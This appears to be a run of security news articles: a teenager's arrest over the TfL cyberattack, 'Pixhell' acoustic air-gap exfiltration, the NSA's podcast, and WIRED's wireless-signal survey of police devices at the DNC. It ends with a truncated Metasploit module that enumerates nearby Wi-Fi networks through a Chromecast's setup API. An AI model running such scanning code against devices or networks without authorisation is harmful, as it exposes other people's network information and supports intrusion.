A recent National Crime Agency (NCA) investigation led to the arrest of a teenager in Walsall, England, linked…

A recent National Crime Agency (NCA) investigation led to the arrest of a teenager in Walsall, England, linked to a cyberattack on Transport for London (TfL). While the attack caused some disruptions, core services were largely unaffected.

National Crime Agency (NCA) has apprehended a teenager in Walsall, England, in connection with a cyber security incident that impacted Transport for London (TfL). The arrest is part of an ongoing investigation into the attack, that caused some disruptions, though the impact on core public transport services was minimal.

> Transport for London (@TfL) is addressing an ongoing cybersecurity incident. No customer data has been compromised, and services are unaffected. They're working with government agencies and will provide updates. Stay informed via the TfL website. #CyberSecurity #London pic.twitter.com/ozUDOs18uw
> 
> — Hackread.com (@HackRead) September 2, 2024

The teenager, whose identity has not been released due to their age, was arrested by NCA officers in Walsall. The arrest follows 2 weeks of investigation into the cyber attack. Charges have not yet been formally filed, but it is anticipated that they will be related to the incident.

The arrest and the age of the alleged hacker align with the **NCA’s February 2024 findings**, which revealed that 1 in 5 youths in the United Kingdom engage in cybercrime. The agency disclosed that one in five children aged 10-16 in the UK have participated in online activities that violate the Computer Misuse Act.

Jake Moore, Global Cybersecurity Advisor at ESET, provided insights into the potential motivations behind the attack and the importance of educating young people about the consequences of cybercrime.

Moore suggested that if a single individual was responsible for the TfL attack, it might have been a “cyber trial” rather than an organized attack. He explained that many young people experiment with their hacking skills without fully understanding the potential consequences of their actions.

“Hopefully, this can be a lesson to all those with similar skills to make sure they use them legally and for good,” Moore said. “When personal and financial details such as bank account numbers and sort codes are compromised, it no longer becomes a game of who can go the furthest and instantly becomes serious.”

> A teenager has been arrested by the NCA, as part of the investigation into a cyber security incident affecting Transport for London (TfL).
> 
> FULL STORY ➡️ https://t.co/TFbZdJ3FDO
> 
> — National Crime Agency (NCA) (@NCA\_UK) September 12, 2024

The involvement of teenagers in cybercrime is quite a serious issue. Unlike older individuals, who may be motivated by financial gain or organized crime, teens often view these activities as a game, without fully understanding the legal and ethical consequences.

Moreover, early involvement in cybercrime could set them on a dangerous path, limiting their potential for positive career opportunities while contributing to an increase in sophisticated online threats. As cyber criminals get younger, the challenges for law enforcement and cybersecurity professionals grow more difficult, demanding targeted interventions to prevent a generation from falling into cybercrime.

Nevertheless, as the investigation into the TfL cyber attack is underway, it is expected that more information will emerge regarding the teenager’s involvement and the extent of the damage caused.

1.  Aussie Arrested for “Evil Twin” Wi-Fi Scam Targeting Travelers
2.  MIT Graduate Brothers Arrested for $25 Million Ethereum Heist
3.  4 Arrested as Operation Endgame Disrupts Ransomware Botnets
4.  23-Year-Old Arrested for Running 100M Incognito Dark Web Market
5.  Teen among suspects arrested in Android banking malware scheme

NCA Arrests Teenager in Walsall Over TfL Cyber Attack

In the "PixHell" attack, sound waves generated by pixels on a screen can transmit information across seemingly impenetrable air gaps.

Source: Miscellaneoustock via Alamy Stock Photo

A newly devised covert channel attack method could undermine diligently devised air gaps at highly sensitive organizations.

In industrial control systems security, the term "air gap" is contested. It typically describes a total physical separation between networks — a literal gap through which no Wi-Fi signals, wires, etc., can pass. The most critical military, government, and industrial sites use air gaps to prevent Internet-based cyber threats from penetrating the kinds of networks that protect state secrets and human lives.

But any medium capable of transmitting information can, in theory, be weaponized to transmit the bad kind. Mordechai Guri of Israel's Ben-Gurion University has long researched ways of crossing air gaps with sound waves: via computer fans, hard disk drives, CD/DVD drives, and more. His latest attack scenario, "Pixhell," enables data theft using sounds produced by specially generated, rapidly shifting bitmap patterns on an LCD screen.

**How Pixhell Works**

It's midnight, and everyone working at the top secret intelligence facility has long gone home for the night, when all of a sudden a computer screen flashes with what appears to be random noise, as if it's missing a signal. It isn't missing a signal — the apparent noise is the signal.  

Pixhell only works if an attacker can infect or control at least one device on each side of an air gap.

Air gaps typically connect critical networks with less critical networks, so the latter half of that job might be achieved by an Internet-based attack, while the former will require more stringent measures. Still, a machine behind an air gap can be infected in any number of ways: via supply chain compromise, a removable drive in the hands of a malicious or unwitting insider, or assorted other options.

Then, with no other obvious means of communicating — not Wi-Fi, Bluetooth, a speaker, or anything else — a computer can be made to transmit information over an air gap via the sounds generated by its screen.

Simplified, LCD screens have capacitors — which store and release electrical charge — and inductors — which help manage the voltage to those capacitors. While they're working, these components generate the faintest of high-pitched frequencies, inaudible to the human ear.

However, "Speakers and microphones generally have a frequency range that is broader than human hearing," explains Andrew Ginter, vice president of industrial security at Waterfall Security Solutions. "The high end of the frequency range is where you can encode the greatest amount of information — the largest number of bits per second — and it's ultrasound. Dogs might freak out in the room, but humans can't hear it."

In experiments, the Pixhell malware manipulated pixels on a screen in such a way as to cause its inductors and capacitors to vibrate at specific frequencies. In so doing, they generated sound waves translating stolen, encoded data to the machine on the other side of an air gap, with varying fidelity at distances of up to two and a half meters. As Ginter puts it, "An attacker can send information from either computer to the other's microphone, and you can be sitting in the room and not realize information is being communicated."

**The Wide World of Covert Channel Attacks**

Besides acoustics, there are any number of other, equally creative means to carry out covert channel attacks in theory.

"It's been reported that with sufficient effort, you can use Ethernet wiring as software-defined radio transmitters and receivers," Ginter notes. Some 20 years ago, 56-kilobit-per-second modems had an LED on the front so users could see if their data was moving. Ginter says you could turn the LED on when there was a one bit being transmitted, or off when it was a zero bit. "And it turned out that the LED was extremely responsive — so responsive that if you had a fast enough camera or detector, you could actually detect every bit that was being sent through the modem by watching the LED," he adds. 

Countless other fun examples can be found in the annals of computer research archives. "Some computers have the ability to do detailed measurements on the voltage that's coming into the battery. And what that means is that if you have two computers plugged into the same circuit, even if they're using different outlets, one computer can consume more power briefly and less power a fraction of a second later, and the other one can detect these very tiny changes in voltage, so they can signal to each other that way. Even though they're electrically connected to different networks, they're both connected to the same power," he explains.

**What the Best Air Gaps Look Like**

For the overwhelming majority of organizations, a physical air gap is sufficient to protect against even high-level adversaries, who aren't likely to pull off Pixhell-style attacks.

Those few most sensitive sites on the planet that have to worry about covert channel attacks — spy agencies, military headquarters, power plants — have already dedicated significant time and resources to building not just air gaps, but air gaps that make these scenarios impractical.

"At some extremely sensitive OT sites, they will have all of the OT equipment in one server room, and they'll have the IT equipment in another server room down the hall. And the only connection between the server rooms is a single fiber-optic connection that is a unidirectional gateway from OT to IT," Ginter explains.

Past that, he adds, the greater the distance between communicating computers, the more difficult it is to exploit covert channels. "If it's an electrical \[channel you're worried about\], you've got electrical noise between rooms. If it's audible, there are closed doors in the way. If it's temperature, you can heat up the room in a region very slightly \[at intervals\], so there's so much thermal noise that it becomes impractical to send any information out." The operative idea is signal-to-noise ratio (SNR): How much noise does one have to generate to make a covert channel attack impractical?

Whether such science-fiction-level defenses are warranted will depend on the organization at risk. "Some of the countermeasures were given for scientific discussion, but they are less practical to deploy in real life," Guri says. As an example, he points out that acoustic jammers would stop Pixhall right in its tracks: "Such a noise jammer may work in countering the attack, but it will make the environment too noisy for people to work."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Air-Gapped Networks Vulnerable to Acoustic Attack via LCD Screens

The spy agency that dared not speak its name is now the Joe Rogan of the SIGINT set. And the pod's actually worth a listen.

My first story for WIRED—yep, 31 years ago—looked at a group of “crypto rebels” who were trying to pry strong encryption technology from the government-classified world and send it into the mainstream. Naturally I attempted to speak to someone at the National Security Agency for comment and ideally get a window into its thinking. Unsurprisingly, that was a no-go, because the NSA was famous for its reticence. Eventually we agreed that I could fax (!) a list of questions. In return I got an unsigned response in unhelpful bureaucratese that didn’t address my queries. Even that represented a loosening of what once was total blackout on anything having to do with this ultra-secretive intelligence agency. For decades after its post–World War II founding, the government revealed nothing, not even the name, of this agency and its activities. Those in the know referred to it as “No Such Agency.”

In recent years, the widespread adoption of encryption technology and the vital need for cybersecurity has led to more openness. Its directors began to speak in public; in 2012, NSA director Keith Alexander actually keynoted Defcon. I’d spent the entire 1990s lobbying to visit the agency for my book _Crypto_; in 2013, I finally crossed the threshold of its iconic Fort Meade Headquarters for an on-the-record conversation with officials, including Alexander. NSA now has social media accounts on Twitter, Instagram, Facebook. And there is a form on the agency website for podcasters to request guest appearances by an actual NSA-ite.

So it shouldn’t be a total shock that NSA is now _doing its own podcast._ You don’t need to be an intelligence agency to know that pods are a unique way to tell stories and hold people’s attention. The first two episodes of the seven-part season dropped this week. It’s called _No Such Podcast_, earning some self-irony points from the get-go.

In keeping with the openness vibe, the NSA granted me an interview with an official in charge of the project—one of the de facto podcast producers, a title that apparently is still not an official NSA job posting. Since NSA still gotta NSA, I can’t use this person’s name. But my source did point out that in the podcast itself, both the hosts and the guests—who are past and present agency officials—speak under their actual identities. We conducted the interview via Microsoft Teams; my spokesperson and one of the hosts were in a room with an impressive background of the official seals of the NSA, the Central Security Service, and the United States Cyber Command. I did my end from a World Trade Center conference room, praying my Wi-Fi wouldn’t cut out.

Why an NSA podcast? The spokesperson explains that the NSA has the world’s best cryptologists and cryptanalysts, all of whom work in silence, and the agency wanted to talk about their critical and amazing work. “The podcast,” the spokesperson says, “is a medium that allows for good storytelling and conversation that is distinct from things we already engage in. It provides a different level of connection.” I later received a statement from Sara Siegle, the NSA’s head of strategic communications, echoing that point: “NSA believes in showcasing the incredible, dedicated work of our diverse, expert workforce. _No Such Podcast_ extends our existing efforts into a new and growing medium.” Got it.

I suggest some secondary motivations. Some of the NSA’s social media posts solicit workers, and this podcast seems likewise designed to appeal to STEM graduates who might place patriotism over working for Google or a startup. My source acknowledged that this was the case. “Recruitment is not the number one goal of the podcast, but we are certainly hoping that by showcasing the work we do here, and the real people on the show who work here, listeners might say, ‘Oh, that sounds like a really cool job—and that person seems pretty normal, right?’”

The NSA also apparently sees the podcast as a chance to answer some critics who charge that the agency is a Big Brother-ish snooping operation that threatens our privacy. In the very first episode, guest speaker Natalie Laing, the NSA’s director of operations, speaks at length about how the NSA limits itself to information relevant to national security and similar imperatives. “Compliance is our number one focus,” she says. By hitting this note so hard that my Apple Watch sent me a volume alert, the NSA seems to be using the podcast format to address suspicions that it violates privacy—especially after the shocking revelations from Edward Snowden about how much stuff the NSA does grab. (I am told Snowden’s name is not uttered in the entire NSA podcast series—no such person?)

The NSA used fairly traditional marketing skills to figure out the format of its podcast. It checked out not only popular pods, but those of its sister intelligence agencies. Yes, the CIA and FBI are already in the game. The NSA finally settled on a classical interview format where a revolving set of four hosts—not outside professionals, but the winners of an internal talent search for employees with broadcast skills—talk with officials about the agency’s operations and exploits. “We definitely wanted that conversational tone that provides space for our guests to share their expertise and stories in a way that doesn’t really feel like lectures,” says my spokesperson. The podcasts were recorded in the NSA’s own in-house video studio. That is a sentence that you will never find in a John LeCarré novel.

As you would expect, there is a lot of vetting to make sure that none of the stories shared on the pod are classified, or would compromise future operations. No, we will not find out whether there is a quantum computer in the basement of the NSA’s Fort Meade, Maryland, headquarters. While the numbers of reviewers varied by episode, I was assured it was more than a dozen and less than a hundred.

I’ve read the transcripts for the first two episodes. The series opens with a bang, with episode 1 recounting the NSA’s role in finding Osama Bin Laden. As background to the narrative, Laing and the other guest, former director of operations Jon Darby, provide a rather detailed precis of the workings of signals intelligence, or SIGINT in spook-speak, which is the core activity of the agency. They give a once-unthinkably straightforward rundown of what the NSA calls its “production cycle”—the way it grabs signals, analyzes them, and distributes them to US officials, the military, our allies, and even some people in the private sector. The information is familiar to those who have been studying intelligence agencies, or at least reading spy novels, but for many years the NSA would confirm none of this.

The description of how SIGINT helped find Bin Laden was gripping, but I missed a journalistic toughness in the questioning. Paging Barton Gellman or our own Andy Greenberg! At one point Jon Darby said, “… the fall of 2001—that’s when we really started really looking for Bin Laden.” Since the NSA was well aware al-Qaeda had already run terror operations against the US, why not earlier? And maybe an explanation of why we were blindsided by 9/11? Another question: While it’s an inspiring triumph that we located Bin Laden, it did take over 10 years. Given how much we pay for the NSA, is that acceptable?

The second episode is about cybersecurity. It struck me as relatively vague, with a lot of talk about the importance of protecting information for the military and even the space program but fewer concrete examples. The guests talk about stopping ransomware attacks but don’t say how. I would have liked to have heard more about how the NSA works with private industry to protect our infrastructure. Or doesn’t. A few spectacular breaches in recent years exposed critical government information, including several whopping hacks of Microsoft by the Russians and the Chinese. Those didn’t make it in that episode.

Still, _No Such Podcast_ can be revealing. The Bin Laden episode had a brief but intriguing digression about encryption. (Future episodes, I am told, will dive deeper into the subject, including one about the history of cryptography.) During the 1990s the NSA had been an active opponent of strong public encryption. But at the end of the decade, the Clinton Administration seemingly ended the Crypto Wars by allowing the private sector to employ the techniques. Nowadays we’ve got the FBI and other law enforcement officials caterwauling about the danger of end-to-end encryption in software made by Apple, Meta, and others. But in this podcast, the NSA’s head of operations is not crying doomsday. To the contrary, Laing brags about how the great codebreakers at the NSA, despite the revolution in private sector cryptography, are still able to get the job done. “Our ability to impact in a positive way our nation's national security, to defend our nation, that has not changed … Every day I am a little gobsmacked at the talent that we have at this agency and the things they are able to do. That absolutely has not changed. And what else hasn't changed is, we can't tell people about it generally.” While the FBI is screaming that we’re doomed if we don’t rein in end-to-end crypto, here is the NSA saying, “We got this.”

For that reason I’ll give a thumbs-up to _No Such Podcast_. Yes, it’s kind of propagandistic—how could it be otherwise?—but despite the podcast’s selective spin on its activities, there’s more signal here than noise. As a bonus, there are no ads for energy drinks, gold bullion, or newly minted cryptocurrency tokens. Also, I’m curious to hear the NSA’s take on artificial intelligence, the subject of an upcoming episode.

Before I end my discussion with the NSA, I ask a question that is top of mind for every podcaster: Will _No Such Podcast_ be picked up for season 2? “We can neither confirm or deny,” says the unnamed person I spoke to. Now _that’s_ the NSA I know.

**Time Travel**

During the six years I spent writing _Crypto_, I begged and begged to visit the NSA, to no avail. After many months of negotiation, I finally got an official interview with a key source. It was conducted at the National Cryptologic Museum, just outside the agency’s gates. Maybe that was an early sign of the thaw that has led to this podcast. But as I documented in my book, in the NSA’s first decades, silence—and an electrified, triple-layered barbed-wire fence—enveloped all that the agency touched or dealt with.

_Since all the salient information about modern crypto was withheld from public view, outsiders could only guess what happened in “The Fort.” The NSA undoubtedly operated the most sophisticated snooping operation in the world. It was universally assumed (though never admitted) that no foreign phone call, radio broadcast, or telegraph transmission was safe from the agency’s global vacuum cleaner. Signals were sucked up and the contents analyzed with a multi-MIPS computer, combing the text for anything of value. …_

_What’s more, the NSA considered itself the sole repository of cryptographic information—not just that used by the civilian government and all the armed forces, as the law dictated, but that used by the private sector as well. Ultimately, the triple-depth fence surrounding its headquarters was not only a physical barrier but a metaphor for the NSA’s near-fanatical drive to hide information about itself and its activities. In the United States of America, serious crypto existed only behind the Triple Fence._

**Ask Me One Thing**

Chris asks, “All things considered, has the internet been a good or bad thing? Or, what percentage good or bad?”

Thanks for the question, Chris. You do realize that the internet is the big, all-encompassing blob where we all now live, right? You might as well ask whether civilization is a good thing. I can think of lots of reasons to answer in the negative, but none that would send me into a cave.

Look, a lot of us went overboard 30 years ago when we realized that the internet was going to be pervasive and revolutionary, and it seemed like an opportunity to do a constructive reset on a lot of things that stood in the way of access and equality and the generally calcified way that media operated. Some of those lofty visions came true, and some unexpected hellscapes arose. Overall, the mistake that the optimists made was somehow forgetting that it would be _people_ who would make the internet what it was, and what it would become. No matter how technology might nudge us into comity, a lot of humanity won’t go there no matter what. And the massive scale of the internet, as well as the riches to be gained, can lure even the most idealistic founders into breaking bad.

I still believe that the internet provides a pathway for the best of humanity to shine. But a lot of people are simply awful, and way too many of them are in your face all the time now. So my answer is 58-42—on the side of the good. No cave for me.

_You can submit questions to_ _mail@wired.com. Write **ASK LEVY** in the subject line._

**End Times Chronicle**

1943: Publication of Herman Hesse’s futuristic, trippy final novel, _The Glass Bead Game_. Last week: Analysis of material from a Chinese space probe reveals glass beads on the moon. Just sayin’.

**Last but Not Least**

Russia’s most feared military intelligence agency now has a cyber warfare team. A meaty subject for _No Such Podcast_!

It wasn’t the NSA but the State Department that discovered the Chinese hacker of Microsoft—and that’s just one thing Secretary of State Anthony Blinken talks about in our Big Interview.

Blinken also goes on camera as the Big Interview now has video!

WIRED hunted hidden police signals at the Democratic Convention–our own SIGINT op!

_Updated 09-06-24, 12:20 pm ET: The story was updated to correct the description of the seals in an NSA meeting room._

_Don't miss future subscriber-only editions of this column._ _**Subscribe to WIRED (50% off for Plaintext readers)**_ _today._

The NSA Has a Podcast—Here's How to Decode It

Using special software, WIRED investigated police surveillance at the DNC. We collected signals from nearly 300,000 devices, revealing vulnerabilities for both law enforcement and everyday citizens alike.

As thousands took to the streets during August’s Democratic National Convention in Chicago to protest Israel’s deadly assault on Gaza, a massive security operation was already underway. US Capitol Police, Secret Service, the Department of Homeland Security’s Homeland Security Investigations, sheriff’s deputies from nearby counties, and local officers from across the country had descended on Chicago and were all out in force, working to manage the crowds and ensure the event went off without any major disruptions.

Amid the headlines and the largely peaceful protests, WIRED was looking for something less visible. We were investigating reports of cell site simulators (CSS), also known as IMSI catchers or Stingrays, the name of one of the technology’s earliest devices, developed by Harris Corporation. These controversial surveillance tools mimic cell towers to trick phones into connecting with them. Activists have long worried that the devices, which can capture sensitive data such as location, call metadata, and app traffic, might be used against political activists and protesters.

Armed with a waist pack stuffed with two rooted Android phones and three Wi-Fi hot spots running CSS-detection software developed by the Electronic Frontier Foundation, a digital-rights nonprofit, we conducted a first-of-its-kind wireless survey of the signals around the DNC.

WIRED attended protests across the city, events at the United Center (where the DNC took place), and social gatherings with lobbyists, political figures, and influencers. We spent time walking the perimeter along march routes and through planned protest sites before, during, and after these events.

In the process we captured Bluetooth, Wi-Fi, and cellular signals. We then analyzed those signals looking for specific hardware identifiers and other suspicious signs that could indicate the presence of a cell-site simulator. Ultimately, we did not find any evidence that cell-site simulators were deployed at the DNC. Nevertheless, when taken together, the hundreds of thousands of data points we accumulated in Chicago reveal how the invisible signals from our devices can create vulnerabilities for activists, police, and everyone in between. Our investigation revealed signals from as many as 297,337 devices, including as many as 2,568 associated with a major police body camera manufacturer, five associated with a law enforcement drone maker, and a massive array of consumer electronics like cameras, hearing aids, internet-of-things devices, and headphones.

WIRED often observed the same devices appearing in different locations, revealing their operators’ patterns of movement. For example, a Chevrolet Wi-Fi hotspot, initially located in the law-enforcement-only parking lot of the United Center, was later found parked on a side street next to a downtown Chicago demonstration. A Wi-Fi signal from a Skydio police drone that hovered above a massive anti-war protest was detected again the next day above the Israeli consulate. And Axon police body cameras with identical hardware identifiers were detected at various protests occurring days apart.

“Surveillance technologies leave traces that can be discovered in real time,” says Cooper Quintin, a senior staff technologist at the EFF. Regardless of the specific technologies WIRED detected, Quintin notes that the ability to identify police technology in real time is significant. “Many of our devices are beaconing in ways that make it possible to track us through wireless signals,” he says. While this makes it possible to track police, Quintin says, “this makes protesters similarly vulnerable to the same types of attacks.”

The signals we collected are a byproduct of our extremely networked world and demonstrate a pervasive and unsettling reality: Military, law enforcement, and consumer devices constantly emit signals that can be intercepted and tracked by anyone with the right tools. In the context of high-stakes scenarios such as election events, gatherings of high-profile politicians and other officials, and large-scale protests, the findings have implications for law enforcement and protesters alike.

WIRED initially focused on finding cell-site simulators due to the secrecy around their use, especially at protests. Cell-site simulators work by tricking nearby phones, cars, and other devices that use cellular infrastructure into connecting to them. They can be used on planes or retrofitted onto trucks.

The dragnet surveillance tool has largely been used by law enforcement to track a specific target’s location, but due to the indiscriminate way it functions, the devices will log the IMSI (international mobile subscriber identity) numbers, unique to each SIM card, of every single device that connects to it.

For years, protesters have suspected that the surveillance technology has been deployed against them during demonstrations. In 2014, following a wave of protests in Chicago over a grand jury's decision not to indict Ferguson, Missouri, police officer Darren Wilson for fatally shooting Michael Brown, a Black teenager, activists overheard a police officer on a scanner asking another officer if he was gathering information from the protest organizer’s phone. Protesters at the time believed this to be a sign that an IMSI-catcher was deployed.

In Illinois, local law enforcement is required to obtain a warrant to use cell-site simulators. However, according to the ACLU of Illinois, the public is not able to verify whether the Chicago Police Department complies with this law, as CPD lawyers have instructed technicians managing cell-site simulators not to keep a log of their use.

Similarly, federal agents, including those from Homeland Security at the DNC, are also required to secure warrants before deploying one of the devices, except in the in cases of immediate threats to national security. A 2023 DHS Inspector General report found, however, that both the Secret Service and Homeland Security Investigations did not always do so.

Given that some lawmakers have attempted to link American anti-war demonstrators to groups like Hamas, which is classified as a terrorist organization by the US government, demonstrators have been concerned that cell-site simulators will get deployed against them. “They think we are terrorists, so they treat us like terrorists,” an anti-war protester who declined to give their name told WIRED at a protest on the first day of the DNC. They say that they wouldn’t be surprised if any of the law enforcement agencies present at the DNC were using an IMSI-Catcher. “I feel my phone getting hot, and I know they are watching.”

For years, the EFF has been developing tools to detect cell-site simulators. In 2019, it released Crocodile Hunter, which uses software-defined radios to identify unusual activity from 4G towers in a specific area. More recently, Quintin, and Will Greenberg, another staff technologist at the EFF, started working on a cheaper and more user-friendly tool called Ray Hunter, designed to detect unusual cellular activity in a similar way.

WIRED worked with Quintin and Greenberg to install Ray Hunter on three wireless hots pots, which allowed reporters to walk around the DNC and related events in Chicago to attempt to detect whether the devices connected to cell-site simulators.

The Rayhunter software works by detecting three key indicators based on a review of academic literature about how cell-site simulators work. First, it checks if the network you're connected to tries to force a downgrade to 2G, which has less security than a 4G or 5G connection. Second, it detects if the network asks your device for an IMSI number. Finally, the software checks if the network requests a "null cipher," a technical term for asking your phone not to use encryption between the phone and the tower.

According to CSS documentation obtained through public records requests, some CSS allow users to connect via Bluetooth or Wi-Fi. So alongside Ray Hunter, WIRED used two rooted Android phones running an app called Wigle, which logs the GPS coordinates of Bluetooth, mobile, and Wi-Fi signals that the phone encounters. This setup enabled us to collect and store data on observed Wi-Fi and Bluetooth activity. Neither phone connected to any Wi-Fi or cellular network, nor did they upload any data to the cloud. We analyzed the data locally.

WIRED focused on identifying MAC addresses, which are unique identifiers assigned to network devices, and OUIs (organizationally unique identifiers), which are usually the first three bytes of a MAC address. We looked for any OUIs of known CSS manufacturers like Harris, KeyW, Jacobs, and Digital Receiver Technology.

One of our first stops in Chicago was at Union Park, where a coalition of political and community organizations had planned a march to call for an end of US aid to Israel.

On Monday afternoon, a smaller-than-expected but still massive crowd of thousands of protesters prepared to march toward the DNC to protest Israel’s deadly siege of Gaza. Hundreds of Chicago police on bicycles lined the approved route, ready to respond. Farther down the planned route, Secret Service agents and other DHS officers observed the demonstration. The march started off peacefully, but by 4:30 pm local time, tensions escalated.

A small group of protesters breached the first of two security fences around the United Center. As some tore down sections of the fence, others climbed over and faced off with law enforcement standing behind the second barrier. Police began photographing the protesters tearing down the barricades, and a CPD helicopter circled as low as 650 feet, according to publicly available flight data WIRED reviewed at the time. CBS later reported 13 arrests from the first day of the convention.

While Rayhunter didn’t pick up any suspicious cellular infrastructure, our other equipment detected three new cell towers that hadn’t been there the day before. According to Quintin, because Rayhunter did not detect any suspicious behaviors, these towers were likely “cell on wheels,” aka COWs, temporary cell towers that companies roll out to provide extra cellular coverage during large events.

Leaving the protest, our Android detected a Wi-Fi network named Skydio X10-c9z2 with a hardware identifier associated with Skydio, a California-based company that sells drones to law enforcement. Skydio equipment has been used as part of Drone as First Responder programs around the country for years. According to marketing material, the Skydio X10 is equipped with multiple high-resolution cameras, including thermal imaging, powerful zoom capabilities, and onboard AI. It’s unclear which agency the drone belongs to.

CPD did not respond to WIRED’s questions about the Skydio drone.

It wasn’t just American law enforcement we suspected may deploy cell-site simulators. In 2019, the FBI alleged that Israel had placed one near the White House—a claim Israel has denied. Similarly, in 2016, protesters opposing the Dakota Access Pipeline suspected that a private security firm, TigerSwan, had used one against them.

On Tuesday of the DNC, an unpermitted protest organized by a self-described militant anti-imperialist group called Behind Enemy Lines was scheduled to take place outside the Israeli Consulate at the Accenture Tower, located two miles east of the United Center. Hours before the planned demonstration, police had already saturated the area. CPD officers on bicycles lined both sides of Madison Street in front of the building’s entrance, while the surrounding plaza served as a staging area for additional officers, who mingled with Secret Service and other DHS personnel.

Data collected by our fanny pack detected a Skydio drone near the Israeli consulate matching the hardware identifiers we identified the previous day. WIRED detected no cell-site simulators near the Israeli consulate.

By 7 pm, approximately 200 protesters had gathered outside the consulate. After a few speeches, tensions escalated as some protesters attempted to continue marching, leading to confrontations with the officers. Outnumbered by both police and journalists, more than 50 people were arrested, including three reporters.

WIRED could not determine the exact number of officers deployed at the protest, and CPD has yet to respond to our request for comment. However, our analysis of Bluetooth signals collected from the Android devices detected hardware identifiers associated with Axon, formerly Taser International, from as many as 720 different devices. Axon develops technology for law enforcement, including Tasers, body cameras, evidence management systems, and other software. The signals we observed were most likely from body-worn cameras used by officers during the demonstration.

The trackability of Axon’s body cameras is a known vulnerability. Last year at the Defcon hacker conference, Alan “Nullagent” Meekins and Roger “RekcahDam” Hicks, cofounders of the Bluetooth tracking platform RFParty, demonstrated that their platform could decipher signals emitted by body cameras, allowing them to detect the presence and approximate position of police officers.

In an email, Axon spokesperson Victoria Keough said that some Axon products have wireless features that enable real-time monitoring of officers during patrols and critical incidents. “While BLE \[ Bluetooth Low Energy \] and other wireless communications can be susceptible to monitoring from other nearby devices, the benefits of BLE in ensuring incidents are captured with maximum visibility are crucial to public safety,” she wrote. Keough added that the current generation body-worn cameras offer the ability to be in “airplane mode” for specific tactical situations.

WIRED’s wireless survey appears to confirm Meekins and Hicks’ findings. Over the course of six days at the DNC, we detected signals from as many as 2,568 different Axon devices. Mapping these signals reveals information about where we encountered police and how they were deployed. For instance, the day after the incident at the Israeli consulate, we returned to the park where protesters had broken through barricades on Monday. Ahead of another planned protest, we found officers blocking entry to the park, designated a “free speech zone” by the city. On a map, a chain of closely clustered circles shows how tightly officers on bikes had formed a perimeter around the side of the park facing the expected protest route.

CPD did not respond to WIRED’s request for comment.

WIRED is not publishing the data collected for this story, partially because of how law enforcement could be able to use that data to identify devices at protests. “This is a known issue within the cybersecurity community,” Quintin of the EFF says. “I think police are starting to get wise to the fact that this is a technique they can use to find people. I wouldn’t be surprised if Bluetooth and wireless tracking is the next big wave of police technology.”

A company called Latent Wireless may be a pioneer in Wi-Fi signal tracking for law enforcement. Founded in 2019 by David Schwindt, a former police officer, Jeff Bromberger, and Peter Scott, both computer scientists, the company developed a Wi-Fi dongle that connects to patrol car computers. This device passively scans and analyzes metadata from Wi-Fi signals encountered by the car and matches detected MAC addresses against a list of stolen electronics or devices linked to criminals or missing persons. If a match is found, the system alerts officers, who can then use a directional antenna to locate the signal’s source.

In one instance that Schwindt and Bromberger shared with WIRED, local police used software from Latent Wireless to locate a suspect in an office building knowing only the MAC address of the employee’s device. In another case, a robber connected to a Wi-Fi network at a local coffee shop before committing a crime. Police identified the MAC address of his device through the coffee shop’s router logs and eventually tracked him down by detecting the signal from that device as they drove around.

Schwindt and Bromberger emphasize that privacy is a priority for the Latent Wireless. They avoid bulk data collection, do not attempt to decrypt traffic, and do not store the locations of observed MAC addresses unless they’re on the hot list.

On Wednesday evening, hundreds of protesters gathered for another march toward the United Center. Thirty minutes after the speakers began addressing the crowd, the thumping of a CPD helicopter's rotors overhead interrupted them. The aircraft, a Bell 206L-4 LongRanger IV or a similar model, circled low—at 500 feet, according to flight data. Its tail number, N911YY, was clearly visible. Something appeared to protrude from a window.

Among the demonstrators, a man in a DHS vest weaved through the crowd, eyes scanning as he spoke into his phone. Curious about what the helicopter might be up to, I asked a freelance photographer, Wali Khan, to try to capture an image with his telephoto lens of whatever was sticking out of the door. Unfortunately, the helicopter was too far away to get a clear picture.

The helicopter circled for about half an hour. Despite my repeated attempts, the Chicago Police Department has yet to respond to my request for records regarding the helicopter’s mission that evening. What is clear, however, is the impact it had on those below. The hovering presence interrupted speeches, causing more than one protester I spoke with to wonder whether they were being singled out. Some people thought the officer was sticking a rifle out the window, while others assumed it was a camera.

None of WIRED’s devices picked up the hidden connections of cell-site simulators that day, or throughout the entire trip, but there were times like this when the surveillance was impossible to miss. “If what comes out of this is that activists spend less time worrying about protecting themselves from IMSI catchers and more time protecting themselves from drones, cameras, and things we know are being used,” Quintin says, “that’s a good outcome.”

_Additional reporting by Makena Kelly_

We Hunted Hidden Police Signals at the DNC

This Metasploit module enumerates wireless access points through Chromecast.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name' => 'Chromecast Wifi Enumeration',      'Description' => %q{        This module enumerates wireless access points through Chromecast.      },      'Author' => ['wvu'],      'References' => [        ['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website      ],      'License' => MSF_LICENSE    ))    register_options([      Opt::RPORT(8008)    ])  end  def run_host(ip)    res = scan    return unless res && res.code == 200    waps_table = Rex::Text::Table.new(      'Header' => "Wireless Access Points from #{ip}",      'Columns' => [        'BSSID',        'PWR',        'ENC',        'CIPHER',        'AUTH',        'ESSID'      ],      'SortIndex' => -1    )    res.get_json_document.each do |wap|      waps_table << [        wap['bssid'],        wap['signal_level'],        enc(wap),        cipher(wap),        auth(wap),        wap['ssid'] + (wap['wpa_id'] ? ' (*)' : '')      ]    end    unless waps_table.rows.empty?      print_line(waps_table.to_s)      report_note(        :host => ip,        :port => rport,        :proto => 'tcp',        :type => 'chromecast.wifi',        :data => waps_table.to_csv      )    end  end  def scan    send_request_raw(      'method' => 'POST',      'uri' => '/setup/scan_wifi',      'agent' => Rex::Text.rand_text_english(rand(42) + 1)    )    send_request_raw(      'method' => 'GET',      'uri' => '/setup/scan_results',      'agent' => Rex::Text.rand_text_english(rand(42) + 1)    )  end  def enc(wap)    case wap['wpa_auth']    when 1      